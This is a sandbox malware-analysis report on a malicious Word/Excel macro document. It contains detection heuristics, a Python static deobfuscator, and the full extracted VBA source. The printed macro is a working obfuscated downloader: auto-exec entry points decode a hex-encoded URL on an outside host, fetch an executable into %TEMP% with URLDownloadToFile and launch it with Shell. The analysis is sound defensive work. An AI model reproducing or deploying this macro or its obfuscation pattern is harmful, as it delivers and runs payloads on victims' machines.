Verdict: MALICIOUS
Risk score: 448

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document carrying obfuscated VBA macros. The AutoOpen and Workbook_Open auto-exec entry points call, through several padding subroutines, a function that rebuilds the download URL and the drop path from hex-encoded strings (a custom HexToString decoder), fetches a second-stage payload with the URLDownloadToFile API into the user's TEMP directory, and launches it with Shell. This is downloader behaviour, commonly associated with malware distribution.
Heuristics (14)

- ClamAV: Doc.Downloader.Macr-2 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.Macr-2
- Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
- VBA macros detected [medium, 8 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL. Matched line in script: dsfdsf = Shell(jghdfdfdfw, 1)
- URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD. Matched line in script: Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: dsfdsf = Shell(jghdfdfdfw, 1)
- Payload URL assembled from a Chr()/Asc() string expression (1 URL) [high] OLE_VBA_EXPR_DROPPER_URL: A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results, often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive. In this sample the expression is three HexToString() calls over hex literals, joined with +, and HexToString itself bottoms out in Chr().
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN. Matched line in script: Sub AutoOpen()
- Workbook_Open macro [low] OLE_VBA_WBOPEN. Matched line in script: Sub Workbook_Open()
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON. Matched line in script: jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, and no stronger macro-virus family marker was present. The rule's own description says it fires when no modern VBA project is recovered; here one was (macros.bas below), so treat this as secondary, analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://216.59.16.87:8080/mopsi/popsi.php (referenced by macro)
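The loader shape described in the heuristics above (a hex-string decoder, padding loops, string concatenation, then URLDownloadToFile and Shell) can be resolved statically without running the macro. The following is an added example, written for this report and not part of the analyzer or of the sample; it mirrors the sample's HexToString routine in Python, strips the Dim/For/DoEvents/Next padding, folds the decoded literals back into the assignments and evaluates the + and & concatenations so the URL and the drop path can be read off the two sinks. The MACRO excerpt is constructed from the statements shown in the preview below with all but one padding loop removed; Environ("TEMP") is kept symbolic as %TEMP% because it is only resolved on the victim machine. All function names are the author's own.

```python
import re
from typing import Dict, List, Optional

# Constructed excerpt of the decoded macro. The real module wraps every one of these statements in
# nested Dim/For/DoEvents/Next padding; only one such loop is kept here to show the stripping step.
MACRO = '''Sub UGivgHgfdg()
Dim sjACsOEZ As Integer
For sjACsOEZ = 0 To 1
DoEvents
Next sjACsOEZ
dgjkhsd = HexToString("6874")
hdsfhjk = HexToString("74703A2F2F")
dhjkfsd = HexToString("3231362E35392E31362E38373A383038302F6D6F7073692F706F7073692E706870")
ewrwedsf = dgjkhsd + hdsfhjk + dhjkfsd
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
wqewr = URLDownloadToFile(0&, ewrwedsf, jghdfdfdfw, 0&, 0&)
Dim dsfdsf
dsfdsf = Shell(jghdfdfdfw, 1)
End Sub
'''

JUNK = re.compile(r"^\s*(Dim \w+ As Integer|For \w+ = \d+ To \d+|Next \w+|DoEvents)\s*$")
HEXCALL = re.compile(r'HexToString\("([0-9A-Fa-f]+)"\)')
ENVIRON = re.compile(r'Environ\("([^"]*)"\)')
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
# One token of a concatenation expression: a string literal, a bare name, or the + / & operator.
TOKEN = re.compile(r'\s*(?:"([^"]*)"|([A-Za-z_]\w*)|([+&]))\s*')


def hex_to_string(hexstr: str) -> str:
    """Mirror of the macro's HexToString: two hex digits at a time, Chr() on each value."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def strip_junk(src: str) -> List[str]:
    """Drop the Dim/For/Next/DoEvents padding so only the statements that do work remain."""
    return [ln for ln in src.splitlines() if ln.strip() and not JUNK.match(ln)]


def fold_strings(line: str) -> str:
    """Replace HexToString("..") with its decoded literal; keep Environ("X") symbolic as "%X%"."""
    line = HEXCALL.sub(lambda m: '"%s"' % hex_to_string(m.group(1)), line)
    return ENVIRON.sub(lambda m: '"%%%s%%"' % m.group(1), line)


def eval_concat(expr: str, env: Dict[str, str]) -> Optional[str]:
    """Evaluate an expression made only of literals and already-resolved names joined by + or &.
    Anything else (a call, a number, an unknown name) yields None so the caller treats it as a sink."""
    pos, parts, want_operand = 0, [], True
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            return None
        lit, name, op = m.groups()
        if want_operand and op is None:
            if lit is not None:
                parts.append(lit)
            elif name in env:
                parts.append(env[name])
            else:
                return None
        elif want_operand or op is None:   # operator where an operand was due, or vice versa
            return None
        want_operand = not want_operand
        pos = m.end()
    return "".join(parts) if not want_operand else None


def resolve(src: str) -> Dict[str, Optional[str]]:
    """Walk the de-padded macro, track string variables, and report what reaches the two sinks."""
    env: Dict[str, str] = {}
    report: Dict[str, Optional[str]] = {"url": None, "drop_path": None, "download": None, "exec": None}
    for line in strip_junk(src):
        m = ASSIGN.match(fold_strings(line))
        if not m:
            continue
        name, expr = m.groups()
        value = eval_concat(expr, env)
        if value is not None:
            env[name] = value
            continue
        # Not a pure string expression: substitute resolved names into the call so the IOC is readable.
        call = re.sub(r"\b[A-Za-z_]\w*\b",
                      lambda mm: '"%s"' % env[mm.group(0)] if mm.group(0) in env else mm.group(0), expr)
        if expr.startswith("URLDownloadToFile"):
            report["download"] = call
            args = re.findall(r'"([^"]*)"', call)
            if len(args) >= 2:
                report["url"], report["drop_path"] = args[0], args[1]
        elif expr.startswith("Shell"):
            report["exec"] = call
    return report


if __name__ == "__main__":
    for key, value in resolve(MACRO).items():
        print(f"{key:10} {value}")
```

Run against the full macros.bas the same walk resolves the URL http://216.59.16.87:8080/mopsi/popsi.php and the drop path %TEMP%\ergfreg.exe, which is why the analyzer can surface the URL as an IOC although it never appears contiguously in the source. The evaluator is deliberately bounded: it only follows literals, resolved names and the two concatenation operators, so a macro that feeds anything else (a CreateObject result, a Replace chain) into the sink is reported as an unresolved call rather than guessed at.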
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7798 bytes |

SHA-256: 0a91e503340e475d5071b67010c5840acd5e822c9aa3b30de27100718e088ca7

Detection
ClamAV: No threats found (the Doc.Downloader.Macr-2 hit listed under Heuristics is on the submitted document, not on the decoded source text)
Obfuscation or payload: likely. 79 of 128 identifiers look randomly generated (e.g. 'UGivgHgfdg'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As LongPtr, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As LongPtr) As LongPtr
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As Long, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
#End If
Sub uiwefds()
Dim PxxgBiNP As Integer
For PxxgBiNP = 0 To 3
Dim NIlZJTAZ As Integer
For NIlZJTAZ = 0 To 2
Dim SkHXFUCU As Integer
For SkHXFUCU = 0 To 9
DoEvents
Next SkHXFUCU
DoEvents
Next NIlZJTAZ
Dim kPqjFzTg As Integer
For kPqjFzTg = 0 To 5
DoEvents
Next kPqjFzTg
DoEvents
Next PxxgBiNP
Dim kYYYffQc As Integer
For kYYYffQc = 0 To 5
Dim ZwNyFHMZ As Integer
For ZwNyFHMZ = 0 To 1
DoEvents
Next ZwNyFHMZ
DoEvents
Next kYYYffQc
Dim iFwnFpAo As Integer
For iFwnFpAo = 0 To 6
DoEvents
Next iFwnFpAo
UGivgHgfdg
End Sub
Sub AutoOpen()
Dim bFcsplDg As Integer
For bFcsplDg = 0 To 7
Dim ShzVbLyO As Integer
For ShzVbLyO = 0 To 5
Dim oQYYiVIE As Integer
For oQYYiVIE = 0 To 9
DoEvents
Next oQYYiVIE
DoEvents
Next ShzVbLyO
Dim zbpkQrDX As Integer
For zbpkQrDX = 0 To 8
DoEvents
Next zbpkQrDX
DoEvents
Next bFcsplDg
Dim kIxlbfDj As Integer
For kIxlbfDj = 0 To 2
Dim dpNiQKzp As Integer
For dpNiQKzp = 0 To 1
DoEvents
Next dpNiQKzp
DoEvents
Next kIxlbfDj
Dim uVEKhVuZ As Integer
For uVEKhVuZ = 0 To 9
DoEvents
Next uVEKhVuZ
uiwefds
End Sub
Sub Workbook_Open()
Dim ftvowRbL As Integer
For ftvowRbL = 0 To 1
Dim fipkKjzB As Integer
For fipkKjzB = 0 To 4
Dim XyjJYqDQ As Integer
For XyjJYqDQ = 0 To 2
DoEvents
Next XyjJYqDQ
DoEvents
Next fipkKjzB
Dim ZvQsURmk As Integer
For ZvQsURmk = 0 To 7
DoEvents
Next ZvQsURmk
DoEvents
Next ftvowRbL
Dim YaKQIzva As Integer
For YaKQIzva = 0 To 8
Dim zbuUTilv As Integer
For zbuUTilv = 0 To 5
DoEvents
Next zbuUTilv
DoEvents
Next YaKQIzva
Dim WfPlofvJ As Integer
For WfPlofvJ = 0 To 4
DoEvents
Next WfPlofvJ
uiwefds
End Sub
Sub UGivgHgfdg()
Dim sjACsOEZ As Integer
For sjACsOEZ = 0 To 1
Dim PbqsdXKI As Integer
For PbqsdXKI = 0 To 2
Dim OYRHxAZy As Integer
For OYRHxAZy = 0 To 8
DoEvents
Next OYRHxAZy
DoEvents
Next PbqsdXKI
Dim ZliAaUUv As Integer
For ZliAaUUv = 0 To 7
DoEvents
Next ZliAaUUv
DoEvents
Next sjACsOEZ
Dim hJYYdjbg As Integer
For hJYYdjbg = 0 To 7
Dim jHPjjUXQ As Integer
For jHPjjUXQ = 0 To 7
DoEvents
Next jHPjjUXQ
DoEvents
Next hJYYdjbg
Dim pRfzMFar As Integer
For pRfzMFar = 0 To 6
DoEvents
Next pRfzMFar
dgjkhsd = HexToString("6874")
hdsfhjk = HexToString("74703A2F2F")
dhjkfsd = HexToString("3231362E35392E31362E38373A383038302F6D6F7073692F706F7073692E706870")
ewrwedsf = dgjkhsd + hdsfhjk + dhjkfsd
Dim mgubxnIb As Integer
For mgubxnIb = 0 To 8
Dim YMlEFDdK As Integer
For YMlEFDdK = 0 To 2
Dim XqVdlrWe As Integer
For XqVdlrWe = 0 To 5
DoEvents
Next XqVdlrWe
DoEvents
Next YMlEFDdK
Dim GVZVCpNw As Integer
For GVZVCpNw = 0 To 6
DoEvents
Next GVZVCpNw
DoEvents
Next mgubxnIb
Dim ddFVFiMb As Integer
For ddFVFiMb = 0 To 8
Dim HGgNeqLB As Integer
For HGgNeqLB = 0 To 6
DoEvents
Next HGgNeqLB
DoEvents
Next ddFVFiMb
Dim VVaaqewe As Integer
For VVaaqewe = 0 To 7
DoEvents
Next VVaaqewe
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
Dim JIXksrqo As Integer
For JIXksrqo = 0 To 6
Dim ZmuZuJAA As Integer
For ZmuZuJAA = 0 To 7
Dim wpZWyUKh As Integer
For wpZWyUKh = 0 To 8
DoEvents
Next wpZWyUKh
DoEvents
Next ZmuZuJAA
Dim RsHNlmzh As Integer
For RsHNlmzh = 0 To 7
DoEvents
Next RsHNlmzh
DoEvents
Next JIXksrqo
Dim wiPdQCYM As Integer
For wiPdQCYM = 0 To 6
Dim MvQkzilR As Integer
For MvQkzilR = 0 To 1
DoEvents
Next MvQkzilR
DoEvents
Next wiPdQCYM
Dim aUclpNWO As Integer
For aUclpNWO = 0 To 2
DoEvents
Next aUclpNWO
wqewr = URLDownloadToFile(0&, ewrwedsf, jghdfdfdfw, 0&, 0&)
Dim dsfdsf
Dim xajSsvKH As Integer
For xajSsvKH = 0 To 3
Dim XotIOnTN As Integer
For XotIOnTN = 0 To 4
Dim QcgeTjsF As Integer
For QcgeTjsF = 0 To 2
DoEvents
Next QcgeTjsF
DoEvents
Next XotIOnTN
Dim LAclisaB As Integer
For LAclisaB = 0 To 3
DoEvents
Next LAclisaB
DoEvents
Next xajSsvKH
Dim GCOldYPl As Integer
For GCOldYPl = 0 To 3
Dim xpAyowIw As Integer
For xpAyowIw = 0 To 6
DoEvents
Next xpAyowIw
DoEvents
Next GCOldYPl
Dim toTFvQyC As Integer
For toTFvQyC = 0 To 3
DoEvents
Next toTFvQyC
dsfdsf = Shell(jghdfdfdfw, 1)
End Sub
Public Function HexToString(ByVal dsfGHJsdf As String) As String
Dim cRFBGXaI As Integer
For cRFBGXaI = 0 To 3
Dim lqCjoUhY As Integer
For lqCjoUhY = 0 To 5
Dim fJrXjdhr As Integer
For fJrXjdhr = 0 To 7
DoEvents
Next fJrXjdhr
DoEvents
Next lqCjoUhY
Dim ibrXgwUZ As Integer
For ibrXgwUZ = 0 To 6
DoEvents
Next ibrXgwUZ
DoEvents
Next cRFBGXaI
Dim xDNrzEzH As Integer
For xDNrzEzH = 0 To 8
Dim JmAtuSal As Integer
For JmAtuSal = 0 To 1
DoEvents
Next JmAtuSal
DoEvents
Next xDNrzEzH
Dim BEgugREc As Integer
For BEgugREc = 0 To 2
DoEvents
Next BEgugREc
For y = 1 To Len(dsfGHJsdf)
Dim AuJDUKFJ As Integer
For AuJDUKFJ = 0 To 4
Dim UvHMzkjr As Integer
For UvHMzkjr = 0 To 1
Dim fHuPigTW As Integer
For fHuPigTW = 0 To 5
DoEvents
Next fHuPigTW
DoEvents
Next UvHMzkjr
Dim uRPwSwPf As Integer
For uRPwSwPf = 0 To 6
DoEvents
Next uRPwSwPf
DoEvents
Next AuJDUKFJ
Dim ezQsDXjM As Integer
For ezQsDXjM = 0 To 3
Dim WadqawBn As Integer
For WadqawBn = 0 To 4
DoEvents
Next WadqawBn
DoEvents
Next ezQsDXjM
Dim dVvhcepx As Integer
For dVvhcepx = 0 To 4
DoEvents
Next dVvhcepx
num = Mid(dsfGHJsdf, y, 2)
Dim PyxhKOLG As Integer
For PyxhKOLG = 0 To 2
Dim hZmZJOoa As Integer
For hZmZJOoa = 0 To 2
Dim ivsfJuvt As Integer
For ivsfJuvt = 0 To 9
DoEvents
Next ivsfJuvt
DoEvents
Next hZmZJOoa
Dim FQeVqElL As Integer
For FQeVqElL = 0 To 6
DoEvents
Next FQeVqElL
DoEvents
Next PyxhKOLG
Dim psmZGKbn As Integer
For psmZGKbn = 0 To 1
Dim AdqmlHZR As Integer
For AdqmlHZR = 0 To 4
DoEvents
Next AdqmlHZR
DoEvents
Next psmZGKbn
Dim maFtCXUC As Integer
For maFtCXUC = 0 To 2
DoEvents
Next maFtCXUC
uGHdsf = uGHdsf & Chr(CDbl("&h" & num))
Dim ibsiUdwv As Integer
For ibsiUdwv = 0 To 7
Dim sVEHRGPJ As Integer
For sVEHRGPJ = 0 To 4
Dim uUvhwdnW As Integer
For uUvhwdnW = 0 To 3
DoEvents
Next uUvhwdnW
DoEvents
Next sVEHRGPJ
Dim NmeaNlTf As Integer
For NmeaNlTf = 0 To 2
DoEvents
Next NmeaNlTf
DoEvents
Next ibsiUdwv
Dim yQiniWGp As Integer
For yQiniWGp = 0 To 6
Dim sagylpuI As Integer
For sagylpuI = 0 To 4
DoEvents
Next sagylpuI
DoEvents
Next yQiniWGp
Dim yFKJVhsa As Integer
For yFKJVhsa = 0 To 6
DoEvents
Next yFKJVhsa
y = y + 1
Next y
Dim pswwxpTG As Integer
For pswwxpTG = 0 To 4
Dim bwEKlAom As Integer
For bwEKlAom = 0 To 1
Dim dBxcXWVq As Integer
For dBxcXWVq = 0 To 8
DoEvents
Next dBxcXWVq
DoEvents
Next bwEKlAom
Dim TJtJSTmd As Integer
For TJtJSTmd = 0 To 4
DoEvents
Next TJtJSTmd
DoEvents
Next pswwxpTG
Dim yImZDVeo As Integer
For yImZDVeo = 0 To 7
Dim LoRMzhbw As Integer
For LoRMzhbw = 0 To 7
DoEvents
Next LoRMzhbw
DoEvents
Next yImZDVeo
Dim bxwRxDlo As Integer
For bxwRxDlo = 0 To 3
DoEvents
Next bxwRxDlo
HexToString = uGHdsf
End Function